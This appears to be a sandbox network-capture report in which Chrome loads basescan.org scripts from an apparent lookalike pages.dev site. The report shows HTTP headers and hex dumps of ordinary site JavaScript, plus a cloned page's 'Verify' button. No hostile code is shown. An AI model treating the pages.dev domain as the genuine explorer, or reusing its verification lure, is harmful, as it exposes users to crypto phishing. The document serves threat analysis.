                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 65 3d 22 73 75 62 6d 69 74 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3d 22 6c 69 67 68 74 42 6c 75 65 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 63 2d 67 74 73 72 48 54 20 67 66 75 53 71 47 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 56 65 72 69 66 79 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0d
                                                                                                                                                                                                                                              Data Ascii: e="submit" color="lightBlue" style="display: block; justify-content: center" > <div class="sc-gtsrHT gfuSqG"></div> Verify </button>
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC911INData Raw: 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 62 74 6e 22 29 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 22 6e 6f 6e 65 22 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 22 68 69 64 65 4c 6f 61 64 65 72 28 29 22 2c 20 34 20 2a 20 31 30 30 30 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 68 69 64 65 4c 6f 61 64 65 72 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6c 6f 61 64 65 72 22 29 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 22 6e 6f 6e
                                                                                                                                                                                                                                              Data Ascii: ocument.getElementById("pbtn").style.display = "none"; setTimeout("hideLoader()", 4 * 1000); } function hideLoader() { document.getElementById("loader").style.display = "non
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              122192.168.2.549869104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC606OUTGET /assets/js/components/hs.go-to.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC867INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:07 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Content-Length: 2595
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: minify
                                                                                                                                                                                                                                              Cf-Polished: origSize=4817
                                                                                                                                                                                                                                              ETag: "07653e4b33bd91:0"
                                                                                                                                                                                                                                              Last-Modified: Wed, 08 Feb 2023 11:53:00 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 58863
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m3NxGQHRCg8OubIOnaKTuUjcwRKpBciIzogmCV5tMnjigOA9IAqtjVnhtsWRr5uotwaqkbkqPRO0ijBnz5iOiToWj0pwegMRgdRwsZbWOMjdGzeBd74XZwN97sLNUg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2e548c64268-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC502INData Raw: 3b 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 27 75 73 65 20 73 74 72 69 63 74 27 3b 24 2e 48 53 43 6f 72 65 2e 63 6f 6d 70 6f 6e 65 6e 74 73 2e 48 53 47 6f 54 6f 3d 7b 5f 62 61 73 65 43 6f 6e 66 69 67 3a 7b 7d 2c 70 61 67 65 43 6f 6c 6c 65 63 74 69 6f 6e 3a 24 28 29 2c 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 73 65 6c 65 63 74 6f 72 2c 63 6f 6e 66 69 67 29 7b 74 68 69 73 2e 63 6f 6c 6c 65 63 74 69 6f 6e 3d 73 65 6c 65 63 74 6f 72 26 26 24 28 73 65 6c 65 63 74 6f 72 29 2e 6c 65 6e 67 74 68 3f 24 28 73 65 6c 65 63 74 6f 72 29 3a 24 28 29 3b 69 66 28 21 24 28 73 65 6c 65 63 74 6f 72 29 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 3b 74 68 69 73 2e 63 6f 6e 66 69 67 3d 63 6f 6e 66 69 67 26 26 24 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 63 6f 6e 66 69 67 29 3f
                                                                                                                                                                                                                                              Data Ascii: ;(function($){'use strict';$.HSCore.components.HSGoTo={_baseConfig:{},pageCollection:$(),init:function(selector,config){this.collection=selector&&$(selector).length?$(selector):$();if(!$(selector).length)return;this.config=config&&$.isPlainObject(config)?
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 28 65 6c 29 2c 24 74 61 72 67 65 74 3d 24 74 68 69 73 2e 64 61 74 61 28 27 74 61 72 67 65 74 27 29 2c 69 73 52 65 66 65 72 65 6e 63 65 64 54 6f 50 61 67 65 3d 42 6f 6f 6c 65 61 6e 28 24 74 68 69 73 2e 64 61 74 61 28 27 69 73 2d 72 65 66 65 72 65 6e 63 65 64 2d 74 6f 2d 70 61 67 65 27 29 29 2c 74 79 70 65 3d 24 74 68 69 73 2e 64 61 74 61 28 27 74 79 70 65 27 29 2c 73 68 6f 77 45 66 66 65 63 74 3d 24 74 68 69 73 2e 64 61 74 61 28 27 73 68 6f 77 2d 65 66 66 65 63 74 27 29 2c 68 69 64 65 45 66 66 65 63 74 3d 24 74 68 69 73 2e 64 61 74 61 28 27 68 69 64 65 2d 65 66 66 65 63 74 27 29 2c 70 6f 73 69 74 69 6f 6e 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 65 6c 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 70 6f 73 69 74 69 6f 6e 27 29 29 2c 63 6f 6d 70 65
                                                                                                                                                                                                                                              Data Ascii: (el),$target=$this.data('target'),isReferencedToPage=Boolean($this.data('is-referenced-to-page')),type=$this.data('type'),showEffect=$this.data('show-effect'),hideEffect=$this.data('hide-effect'),position=JSON.parse(el.getAttribute('data-position')),compe
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC724INData Raw: 64 20 27 2b 73 68 6f 77 45 66 66 65 63 74 29 2e 63 73 73 28 7b 27 6f 70 61 63 69 74 79 27 3a 27 27 7d 29 3b 7d 29 3b 7d 65 6c 73 65 20 69 66 28 24 28 77 69 6e 64 6f 77 29 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 3c 3d 6f 66 66 73 65 74 54 6f 70 26 26 24 74 68 69 73 2e 68 61 73 43 6c 61 73 73 28 27 6a 73 2d 61 6e 69 6d 61 74 69 6f 6e 2d 77 61 73 2d 66 69 72 65 64 27 29 29 7b 24 2e 64 61 74 61 28 74 68 69 73 2c 27 73 63 72 6f 6c 6c 54 69 6d 65 72 27 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 24 74 68 69 73 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 6a 73 2d 61 6e 69 6d 61 74 69 6f 6e 2d 77 61 73 2d 66 69 72 65 64 20 27 2b 73 68 6f 77 45 66 66 65 63 74 29 3b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 24 74 68 69 73
                                                                                                                                                                                                                                              Data Ascii: d '+showEffect).css({'opacity':''});});}else if($(window).scrollTop()<=offsetTop&&$this.hasClass('js-animation-was-fired')){$.data(this,'scrollTimer',setTimeout(function(){$this.removeClass('js-animation-was-fired '+showEffect);setTimeout(function(){$this


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              123192.168.2.549870104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC614OUTGET /assets/js/components/hs.cubeportfolio.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC871INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:07 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Content-Length: 2829
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: minify
                                                                                                                                                                                                                                              Cf-Polished: origSize=5281
                                                                                                                                                                                                                                              ETag: "07653e4b33bd91:0"
                                                                                                                                                                                                                                              Last-Modified: Wed, 08 Feb 2023 11:53:00 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 58863
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ckeDffZzmArDJVKFrZDLLvGCInGFFlnj%2F1DQFUU59knxGEhRuH3oj6hBklFXlEGCJqBY5ugfLuRwRbxC%2FzZjI6ZNtuOaeoxbVOYPKi0KGjN3OhkfxB2JnXm7dYyVoA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2e58d8942ca-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC498INData Raw: 3b 28 66 75 6e 63 74 69 6f 6e 28 24 29 7b 27 75 73 65 20 73 74 72 69 63 74 27 3b 24 2e 48 53 43 6f 72 65 2e 63 6f 6d 70 6f 6e 65 6e 74 73 2e 48 53 43 75 62 65 70 6f 72 74 66 6f 6c 69 6f 3d 7b 5f 62 61 73 65 43 6f 6e 66 69 67 3a 7b 7d 2c 70 61 67 65 43 6f 6c 6c 65 63 74 69 6f 6e 3a 24 28 29 2c 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 73 65 6c 65 63 74 6f 72 2c 63 6f 6e 66 69 67 29 7b 74 68 69 73 2e 63 6f 6c 6c 65 63 74 69 6f 6e 3d 73 65 6c 65 63 74 6f 72 26 26 24 28 73 65 6c 65 63 74 6f 72 29 2e 6c 65 6e 67 74 68 3f 24 28 73 65 6c 65 63 74 6f 72 29 3a 24 28 29 3b 69 66 28 21 24 28 73 65 6c 65 63 74 6f 72 29 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 3b 74 68 69 73 2e 63 6f 6e 66 69 67 3d 63 6f 6e 66 69 67 26 26 24 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74
                                                                                                                                                                                                                                              Data Ascii: ;(function($){'use strict';$.HSCore.components.HSCubeportfolio={_baseConfig:{},pageCollection:$(),init:function(selector,config){this.collection=selector&&$(selector).length?$(selector):$();if(!$(selector).length)return;this.config=config&&$.isPlainObject
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 69 6f 6e 3b 74 68 69 73 2e 63 6f 6c 6c 65 63 74 69 6f 6e 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 69 2c 65 6c 29 7b 76 61 72 20 24 74 68 69 73 3d 24 28 65 6c 29 2c 73 65 74 43 6f 6e 74 72 6f 6c 73 3d 24 74 68 69 73 2e 64 61 74 61 28 27 63 6f 6e 74 72 6f 6c 73 27 29 2c 73 65 74 4c 61 79 6f 75 74 3d 24 74 68 69 73 2e 64 61 74 61 28 27 6c 61 79 6f 75 74 27 29 2c 73 65 74 58 47 61 70 3d 24 74 68 69 73 2e 64 61 74 61 28 27 78 2d 67 61 70 27 29 2c 73 65 74 59 47 61 70 3d 24 74 68 69 73 2e 64 61 74 61 28 27 79 2d 67 61 70 27 29 2c 73 65 74 41 6e 69 6d 61 74 69 6f 6e 3d 24 74 68 69 73 2e 64 61 74 61 28 27 61 6e 69 6d 61 74 69 6f 6e 27 29 2c 73 65 74 43 61 70 74 69 6f 6e 41 6e 69 6d 61 74 69 6f 6e 3d 24 74 68 69 73 2e 64 61 74 61 28 27 63 61 70 74 69 6f 6e 2d
                                                                                                                                                                                                                                              Data Ascii: ion;this.collection.each(function(i,el){var $this=$(el),setControls=$this.data('controls'),setLayout=$this.data('layout'),setXGap=$this.data('x-gap'),setYGap=$this.data('y-gap'),setAnimation=$this.data('animation'),setCaptionAnimation=$this.data('caption-
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC962INData Raw: 27 2c 73 69 6e 67 6c 65 50 61 67 65 49 6e 6c 69 6e 65 44 65 6c 65 67 61 74 65 3a 27 2e 63 62 70 2d 73 69 6e 67 6c 65 50 61 67 65 49 6e 6c 69 6e 65 27 2c 73 69 6e 67 6c 65 50 61 67 65 49 6e 6c 69 6e 65 50 6f 73 69 74 69 6f 6e 3a 27 62 65 6c 6f 77 27 2c 73 69 6e 67 6c 65 50 61 67 65 49 6e 6c 69 6e 65 49 6e 46 6f 63 75 73 3a 74 72 75 65 2c 73 69 6e 67 6c 65 50 61 67 65 49 6e 6c 69 6e 65 43 61 6c 6c 62 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 75 72 6c 2c 65 6c 65 6d 65 6e 74 29 7b 76 61 72 20 74 3d 74 68 69 73 3b 24 2e 61 6a 61 78 28 7b 75 72 6c 3a 75 72 6c 2c 74 79 70 65 3a 27 47 45 54 27 2c 64 61 74 61 54 79 70 65 3a 27 68 74 6d 6c 27 2c 74 69 6d 65 6f 75 74 3a 33 30 30 30 30 7d 29 2e 64 6f 6e 65 28 66 75 6e 63 74 69 6f 6e 28 72 65 73 75 6c 74 29 7b 74 2e 75
                                                                                                                                                                                                                                              Data Ascii: ',singlePageInlineDelegate:'.cbp-singlePageInline',singlePageInlinePosition:'below',singlePageInlineInFocus:true,singlePageInlineCallback:function(url,element){var t=this;$.ajax({url:url,type:'GET',dataType:'html',timeout:30000}).done(function(result){t.u


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              124192.168.2.549873104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC612OUTGET /assets/js/custom/combine-js-bottom2.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC875INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:08 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Content-Length: 11579
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: minify
                                                                                                                                                                                                                                              Cf-Polished: origSize=17934
                                                                                                                                                                                                                                              ETag: "4924b8c1adfda1:0"
                                                                                                                                                                                                                                              Last-Modified: Fri, 26 Jul 2024 05:13:27 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 58864
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HwBZcavyFNywxLEwOA%2BiqBbmuaoqNytZledEuvV59sViaBaxmXLxFqxVoBdxZEQBM7OYTPrdtp0yO%2FPDiSNiyOi0RuZekZrZ76I%2BNQUVYXbKHRuzUrm0DxoXrQh7pw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2e8fbeb8c83-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC494INData Raw: 76 61 72 20 71 75 65 72 79 73 74 72 69 6e 67 3d 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 73 72 63 2e 73 75 62 73 74 72 69 6e 67 28 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 73 72 63 2e 69 6e 64 65 78 4f 66 28 22 3f 22 29 29 3b 76 61 72 20 75 72 6c 50 61 72 61 6d 73 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 71 75 65 72 79 73 74 72 69 6e 67 29 3b 24 2e 61 6a 61 78 28 7b 75 72 6c 3a 27 2f 61 73 73 65 74 73 2f 6a 73 2f 63 75 73 74 6f 6d 2f 63 6f 6d 6d 6f 6e 6a 73 5f 74 6f 6b 65 6e 2e 6a 73 3f 27 2b 75 72 6c 50 61 72 61 6d 73 2c 61 73 79 6e 63 3a 66 61 6c 73 65 2c 64 61 74 61 54 79 70 65 3a 22 73 63 72 69 70 74 22 2c 63 61 63 68 65 3a 74 72 75 65 2c 7d 29 3b 76 61 72 20 63 6f 6e 74 65
                                                                                                                                                                                                                                              Data Ascii: var querystring=document.currentScript.src.substring(document.currentScript.src.indexOf("?"));var urlParams=new URLSearchParams(querystring);$.ajax({url:'/assets/js/custom/commonjs_token.js?'+urlParams,async:false,dataType:"script",cache:true,});var conte
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 33 30 29 7b 73 68 6f 77 41 64 2e 70 75 73 68 28 61 76 61 69 6c 61 62 6c 65 41 64 5b 32 5d 29 3b 7d 65 6c 73 65 20 69 66 28 64 2e 67 65 74 53 65 63 6f 6e 64 73 28 29 3e 3d 31 35 29 7b 73 68 6f 77 41 64 2e 70 75 73 68 28 61 76 61 69 6c 61 62 6c 65 41 64 5b 31 5d 29 3b 7d 65 6c 73 65 7b 73 68 6f 77 41 64 2e 70 75 73 68 28 61 76 61 69 6c 61 62 6c 65 41 64 5b 30 5d 29 3b 7d 7d 65 6c 73 65 20 69 66 28 69 6e 74 41 64 43 6f 75 6e 74 3d 3d 33 29 7b 69 66 28 64 2e 67 65 74 53 65 63 6f 6e 64 73 28 29 3e 3d 34 30 29 7b 73 68 6f 77 41 64 2e 70 75 73 68 28 61 76 61 69 6c 61 62 6c 65 41 64 5b 32 5d 29 3b 7d 65 6c 73 65 20 69 66 28 64 2e 67 65 74 53 65 63 6f 6e 64 73 28 29 3e 3d 32 30 29 7b 73 68 6f 77 41 64 2e 70 75 73 68 28 61 76 61 69 6c 61 62 6c 65 41 64 5b 31 5d 29
                                                                                                                                                                                                                                              Data Ascii: 30){showAd.push(availableAd[2]);}else if(d.getSeconds()>=15){showAd.push(availableAd[1]);}else{showAd.push(availableAd[0]);}}else if(intAdCount==3){if(d.getSeconds()>=40){showAd.push(availableAd[2]);}else if(d.getSeconds()>=20){showAd.push(availableAd[1])
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 65 78 3d 2f 5e 5c 64 2b 24 2f 3b 69 66 28 74 79 70 65 76 61 6c 3d 3d 22 22 26 26 28 75 69 2e 69 74 65 6d 2e 6c 61 62 65 6c 3d 3d 22 41 64 64 72 65 73 73 65 73 22 7c 7c 75 69 2e 69 74 65 6d 2e 6c 61 62 65 6c 3d 3d 22 50 72 69 76 61 74 65 22 29 29 7b 74 79 70 65 76 61 6c 3d 33 3b 75 69 2e 69 74 65 6d 2e 76 61 6c 75 65 3d 24 28 22 23 68 64 6e 53 65 61 72 63 68 54 65 78 74 22 29 2e 76 61 6c 28 29 3b 7d 0a 65 6c 73 65 20 69 66 28 74 79 70 65 76 61 6c 3d 3d 22 22 26 26 75 69 2e 69 74 65 6d 2e 6c 61 62 65 6c 3d 3d 22 54 6f 6b 65 6e 73 22 29 7b 74 79 70 65 76 61 6c 3d 32 3b 75 69 2e 69 74 65 6d 2e 76 61 6c 75 65 3d 24 28 22 23 68 64 6e 53 65 61 72 63 68 54 65 78 74 22 29 2e 76 61 6c 28 29 3b 7d 0a 65 6c 73 65 20 69 66 28 74 79 70 65 76 61 6c 3d 3d 22 22 26 26 75
                                                                                                                                                                                                                                              Data Ascii: ex=/^\d+$/;if(typeval==""&&(ui.item.label=="Addresses"||ui.item.label=="Private")){typeval=3;ui.item.value=$("#hdnSearchText").val();}else if(typeval==""&&ui.item.label=="Tokens"){typeval=2;ui.item.value=$("#hdnSearchText").val();}else if(typeval==""&&u
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 66 3d 27 2f 61 64 64 72 65 73 73 2f 27 2b 75 69 2e 69 74 65 6d 2e 76 61 6c 75 65 3b 7d 65 6c 73 65 20 69 66 28 74 79 70 65 76 61 6c 3d 3d 34 29 7b 65 76 65 6e 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 61 64 64 72 65 73 73 2f 27 2b 75 69 2e 69 74 65 6d 2e 6c 61 62 65 6c 3b 7d 65 6c 73 65 20 69 66 28 74 79 70 65 76 61 6c 3d 3d 35 29 7b 65 76 65 6e 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 6c 61 62 65 6c 63 6c 6f 75 64 2f 27 2b 75 69 2e 69 74 65 6d 2e 76 61 6c 75 65 3b 7d 65 6c 73 65 20 69 66 28 74 79 70 65 76 61 6c 3d 3d 36 29 7b 65 76 65 6e 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28
                                                                                                                                                                                                                                              Data Ascii: f='/address/'+ui.item.value;}else if(typeval==4){event.preventDefault();window.location.href='/address/'+ui.item.label;}else if(typeval==5){event.preventDefault();window.location.href='/labelcloud/'+ui.item.value;}else if(typeval==6){event.preventDefault(
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 6c 6f 63 6b 69 65 73 2e 63 72 65 61 74 65 28 7b 73 65 65 64 3a 69 74 65 6d 2e 76 61 6c 75 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 73 69 7a 65 3a 38 2c 73 63 61 6c 65 3a 31 36 7d 29 2e 74 6f 44 61 74 61 55 52 4c 28 29 3b 69 6d 67 6c 6f 67 6f 3d 22 3c 69 6d 67 20 63 6c 61 73 73 3d 27 75 2d 78 73 2d 61 76 61 74 61 72 20 72 6f 75 6e 64 65 64 2d 63 69 72 63 6c 65 27 20 73 74 79 6c 65 3d 27 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 70 78 3b 27 20 73 72 63 3d 27 22 2b 62 6c 6f 63 6b 69 65 73 44 61 74 61 2b 22 27 3e 22 3b 7d 0a 65 6c 73 65 7b 69 6d 67 6c 6f 67 6f 3d 22 3c 69 6d 67 20 63 6c 61 73 73 3d 27 75 2d 78 73 2d 61 76 61 74 61 72 27 20 73 74 79 6c 65 3d 27 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 70 78 3b 27 20 73 72 63 3d 27 2f 69 6d 61 67 65 73 2f 6d
                                                                                                                                                                                                                                              Data Ascii: lockies.create({seed:item.value.toLowerCase(),size:8,scale:16}).toDataURL();imglogo="<img class='u-xs-avatar rounded-circle' style='margin-top: 1px;' src='"+blockiesData+"'>";}else{imglogo="<img class='u-xs-avatar' style='margin-top: 1px;' src='/images/m
